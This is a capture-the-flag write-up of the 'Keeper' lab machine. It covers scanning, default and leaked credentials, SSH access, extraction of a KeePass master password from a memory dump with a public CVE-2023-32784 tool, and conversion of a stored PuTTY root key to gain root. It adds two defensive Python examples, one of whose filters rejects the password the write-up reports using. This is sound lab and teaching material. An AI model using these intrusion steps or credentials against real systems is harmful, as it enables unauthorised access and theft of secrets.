CTF: Keeper

10.10.11.227

nmap

    nmap -sVC -p- 10.10.11.227 -T5 -vvvv

Output:

    PORT   STATE SERVICE REASON  VERSION
    22/tcp open  ssh     syn-ack OpenSSH 8.9p1 Ubuntu 3ubuntu0.3 (Ubuntu Linux; protocol 2.0)
    | ssh-hostkey:
    |   256 3539d439404b1f6186dd7c37bb4b989e (ECDSA)
    | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBKHZRUyrg9VQfKeHHT6CZwCwu9YkJosNSLvDmPM9EC0iMgHj7URNWV3LjJ00gWvduIq7MfXOxzbfPAqvm2ahzTc=
    |   256 1ae972be8bb105d5effedd80d8efc066 (ED25519)
    |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIBe5w35/5klFq1zo5vISwwbYSVy1Zzy+K9ZCt0px+goO
    80/tcp open  http    syn-ack nginx 1.18.0 (Ubuntu)
    |_http-title: Site doesn't have a title (text/html).
    | http-methods:
    |_  Supported Methods: GET HEAD
    |_http-server-header: nginx/1.18.0 (Ubuntu)
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Web

The main page refers to tickets.keeper.htb, so add tickets.keeper.htb and keeper.htb to /etc/hosts:

    ➜  ~ tail -1 /etc/hosts
    10.10.11.227 tickets.keeper.htb keeper.htb

RT (Request Tracker) login page

Google it to find the default password.

SSRF?

When I tried to create a ticket it looked like there might be an SSRF, but it is only because the application redirects to keeper.htb instead of tickets.keeper.htb.

Page for mobile

http://tickets.keeper.htb/rt/m

    dirsearch -u http://tickets.keeper.htb/rt --exclude-status=302

Useless.

Users

    lnorgaard    Lise Nørgaard
    root         Enoch Root


The user's detail page gives a lot of information:

Nickname: Lise
Language: Danish
Unix Login: lnorgaard
Extra info: Helpdesk Agent from Korsbæk
Comment: New user. Initial password set to Welcome2023!

SSH

Login: lnorgaard
Password: Welcome2023!

    ssh lnorgaard@10.10.11.227

RT30000.zip

The file RT30000.zip is in my home directory.
To download it to my machine I start a web server on the target and fetch it from there.

Unzip it then see what is inside:

    ➜  keeper unzip RT30000.zip
    Archive:  RT30000.zip
      inflating: KeePassDumpFull.dmp
     extracting: passcodes.kdbx

    ➜  keeper file *
    KeePassDumpFull.dmp: Mini DuMP crash report, 16 streams, Fri May 19 13:46:21 2023, 0x1806 type
    passcodes.kdbx:      Keepass password database 2.x KDBX
    RT30000.zip:         Zip archive data, at least v2.0 to extract, compression method=deflate

KeePass 2.X dumper (CVE-2023-32784)

    git clone https://github.com/z-jxy/keepass_dump
    python3 keepass_dump/keepass_dump.py -f KeePassDumpFull.dmp

The recovered password is incomplete: the first character is unknown and some characters are missing.

    Extracted: {UNKNOWN}dgrd med flde

Searching for the fragment turns up the Danish dessert name "Rødgrød med Fløde", so the password should be one of:

    Rødgrød med Fløde
    Rodgrod med Flode
    RodgrodmedFlode
    rdgrd med flde
    odgrd med flde
    rødgrød med fløde
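As an added example (not code from the write-up or from the keepass_dump project), the script below does mechanically what the candidate list above does by hand: it derives the case, transliteration and spacing variants of the phrase and then keeps only those that agree with the leaked fragment. The filter assumes two things about the dumper's output, both labelled in the code: the first character is never recovered, and characters outside ASCII (ø) are not printed. The names `variants`, `consistent_with_leak` and `likely_candidates` are my own. The lesson for a defender is how little is left to guess once a dictionary phrase is known: a phrase master password offers almost no margin against a partial leak like this one.

```python
"""Enumerate password candidates from a dictionary phrase and filter them
against a partially leaked password.

Added example, not part of the write-up. Assumptions (not stated by the
tool's documentation, only inferred from the output on the page):
  * the dumper never recovers the first character ("{UNKNOWN}"), and
  * it prints only 7-bit ASCII characters, so ø is silently dropped.
"""
import itertools

LEAKED = "{UNKNOWN}dgrd med flde"   # dumper output quoted in the write-up
PHRASE = "Rødgrød med Fløde"         # phrase found by searching for the fragment

# How a user might type the Danish letters on a non-Danish keyboard
# (assumption; extend as needed).
TRANSLIT = str.maketrans({"ø": "o", "Ø": "O", "æ": "ae", "Æ": "Ae",
                          "å": "aa", "Å": "Aa"})


def ascii_only(s: str) -> str:
    """Drop every character outside 7-bit ASCII (what the dumper printed)."""
    return "".join(c for c in s if ord(c) < 128)


def variants(phrase: str) -> list[str]:
    """Distinct candidates from three independent choices: case (as written /
    lower), non-ASCII handling (keep / transliterate / strip) and spaces
    (keep / remove). 2 * 3 * 2 = 12 candidates for this phrase."""
    case_fns = [lambda s: s, str.lower]
    nonascii_fns = [lambda s: s, lambda s: s.translate(TRANSLIT), ascii_only]
    space_fns = [lambda s: s, lambda s: s.replace(" ", "")]
    out: list[str] = []
    for case, nonascii, space in itertools.product(case_fns, nonascii_fns, space_fns):
        cand = space(nonascii(case(phrase)))
        if cand not in out:
            out.append(cand)
    return out


def consistent_with_leak(candidate: str, leaked: str = LEAKED) -> bool:
    """True if `candidate` could have produced `leaked` under the two
    assumptions above: skip the first character, then compare the ASCII
    residue of the rest with the recovered tail (case-sensitive, since the
    leak reproduces the characters as typed)."""
    marker = "{UNKNOWN}"
    if not leaked.startswith(marker):
        return False
    return ascii_only(candidate[1:]) == leaked[len(marker):]


def likely_candidates(phrase: str = PHRASE, leaked: str = LEAKED) -> list[str]:
    """Variants of `phrase` that are consistent with the leak."""
    return [v for v in variants(phrase) if consistent_with_leak(v, leaked)]


if __name__ == "__main__":
    for v in variants(PHRASE):
        flag = "match" if consistent_with_leak(v) else "     "
        print(f"{flag}  {v}")
```

Only two of the twelve variants survive the filter, which is the whole point: the leak plus a web search reduces a 17-character master password to a couple of guesses. Note that the filter is strict about case, so the write-up's mixed-case candidates are rejected by it; the write-up's own result is unaffected by that, as it lists every candidate and tries them in KeePassXC.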

Open the database with KeePassXC.

Password: Rodgrod med Flode

The database holds a root entry:

Root Password: F4><3K0nd!
Notes:

    PuTTY-User-Key-File-3: ssh-rsa
    Encryption: none
    Comment: rsa-key-20230519
    Public-Lines: 6
    AAAAB3NzaC1yc2EAAAADAQABAAABAQCnVqse/hMswGBRQsPsC/EwyxJvc8Wpul/D
    8riCZV30ZbfEF09z0PNUn4DisesKB4x1KtqH0l8vPtRRiEzsBbn+mCpBLHBQ+81T
    EHTc3ChyRYxk899PKSSqKDxUTZeFJ4FBAXqIxoJdpLHIMvh7ZyJNAy34lfcFC+LM
    Cj/c6tQa2IaFfqcVJ+2bnR6UrUVRB4thmJca29JAq2p9BkdDGsiH8F8eanIBA1Tu
    FVbUt2CenSUPDUAw7wIL56qC28w6q/qhm2LGOxXup6+LOjxGNNtA2zJ38P1FTfZQ
    LxFVTWUKT8u8junnLk0kfnM4+bJ8g7MXLqbrtsgr5ywF6Ccxs0Et
    Private-Lines: 14
    (the 14 private key lines are not reproduced here)
    Private-MAC: b0a0fd2edf4f0e557200121aa673732c9e76750739db05adc3ab65ec34c55cb0

This is the root SSH private key, but it is stored in PuTTY's PPK format rather than the OpenSSH format.

Convert id_rsa and ssh into root

https://superuser.com/questions/232362/how-to-convert-ppk-key-to-openssh-key-under-linux

Install the PuTTY tools:

    sudo apt-get install putty-tools

Convert the key (private and public halves) to OpenSSH format:

    puttygen id-rsa-putty -O private-openssh -o id_dsa
    puttygen id-rsa-putty -O public-openssh -o id_dsa.pub

Only the private key is needed; the key has no passphrase (Encryption: none), so the root password turns out to be useless.

I'm root.
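As an added example (not code from the write-up, and not PuTTY's own code), here is a small parser for the PPK version 3 header shown above. It reads the `Key: Value` header lines and the `Public-Lines` / `Private-Lines` sections, reports whether the private part is passphrase-protected (the `Encryption` field, which is the detail that made the password irrelevant here), and rebuilds the OpenSSH one-line public key that `puttygen -O public-openssh` would emit. The sample embedded in the code is the public half of the key from the write-up; the 14 private lines are omitted, as they are on the page, so only the header and public section are parsed. The function names `parse_ppk`, `public_key_info`, `openssh_public_line` and `is_passphrase_protected` are my own.

```python
"""Parse a PuTTY-User-Key-File-3 (PPK) header and derive the OpenSSH public key.

Added example, not code from the write-up or from PuTTY. The PPK layout
assumed here: one 'Key: Value' line per header field; 'Public-Lines: N'
and 'Private-Lines: N' are each followed by exactly N base64 lines.
"""
import base64
import struct

# Public half of the key quoted in the write-up; the private lines are
# deliberately absent, as they are on the page.
SAMPLE_PPK = """\
PuTTY-User-Key-File-3: ssh-rsa
Encryption: none
Comment: rsa-key-20230519
Public-Lines: 6
AAAAB3NzaC1yc2EAAAADAQABAAABAQCnVqse/hMswGBRQsPsC/EwyxJvc8Wpul/D
8riCZV30ZbfEF09z0PNUn4DisesKB4x1KtqH0l8vPtRRiEzsBbn+mCpBLHBQ+81T
EHTc3ChyRYxk899PKSSqKDxUTZeFJ4FBAXqIxoJdpLHIMvh7ZyJNAy34lfcFC+LM
Cj/c6tQa2IaFfqcVJ+2bnR6UrUVRB4thmJca29JAq2p9BkdDGsiH8F8eanIBA1Tu
FVbUt2CenSUPDUAw7wIL56qC28w6q/qhm2LGOxXup6+LOjxGNNtA2zJ38P1FTfZQ
LxFVTWUKT8u8junnLk0kfnM4+bJ8g7MXLqbrtsgr5ywF6Ccxs0Et
Private-MAC: b0a0fd2edf4f0e557200121aa673732c9e76750739db05adc3ab65ec34c55cb0
"""

MAGIC = "PuTTY-User-Key-File-3"


def parse_ppk(text: str) -> dict:
    """Return the header fields as a dict. The multi-line sections are
    joined into single base64 strings under the keys 'public' and
    'private' (the latter only if a Private-Lines section is present)."""
    lines = text.splitlines()
    fields: dict = {}
    i = 0
    while i < len(lines):
        line = lines[i]
        i += 1
        if not line.strip():
            continue
        key, _, value = line.partition(":")
        key, value = key.strip(), value.strip()
        if key in ("Public-Lines", "Private-Lines"):
            n = int(value)
            section = key.split("-")[0].lower()       # 'public' / 'private'
            fields[section] = "".join(lines[i:i + n])
            i += n
        else:
            fields[key] = value
    if MAGIC not in fields:
        raise ValueError("not a PPK version 3 file")
    return fields


def _read_string(buf: bytes, off: int):
    """Read one SSH wire-format string (uint32 length + bytes)."""
    (n,) = struct.unpack(">I", buf[off:off + 4])
    return buf[off + 4:off + 4 + n], off + 4 + n


def public_key_info(fields: dict) -> dict:
    """Decode the public blob: key type, and for ssh-rsa the exponent and
    modulus size. The blob is the same SSH wire format OpenSSH uses."""
    blob = base64.b64decode(fields["public"])
    ktype, off = _read_string(blob, 0)
    info = {"type": ktype.decode()}
    if info["type"] == "ssh-rsa":
        e, off = _read_string(blob, off)
        n, off = _read_string(blob, off)
        info["e"] = int.from_bytes(e, "big")
        info["bits"] = int.from_bytes(n, "big").bit_length()
    return info


def openssh_public_line(fields: dict) -> str:
    """Because Public-Lines is already the base64 SSH public blob, the
    OpenSSH one-line form is just '<type> <base64> <comment>'."""
    return f"{fields[MAGIC]} {fields['public']} {fields.get('Comment', '')}".rstrip()


def is_passphrase_protected(fields: dict) -> bool:
    """'Encryption: none' means the private lines are stored in the clear."""
    return fields.get("Encryption", "none") != "none"


if __name__ == "__main__":
    f = parse_ppk(SAMPLE_PPK)
    print("passphrase protected:", is_passphrase_protected(f))
    print(public_key_info(f))
    print(openssh_public_line(f))
```

Running it on the sample reports a 2048-bit ssh-rsa key with no passphrase. That `Encryption: none` field is worth checking in any audit of stored keys: a PPK with no passphrase is fully usable by anyone who can read the file (here, anyone who could open the KeePass database), which is exactly what the final step of the write-up relies on.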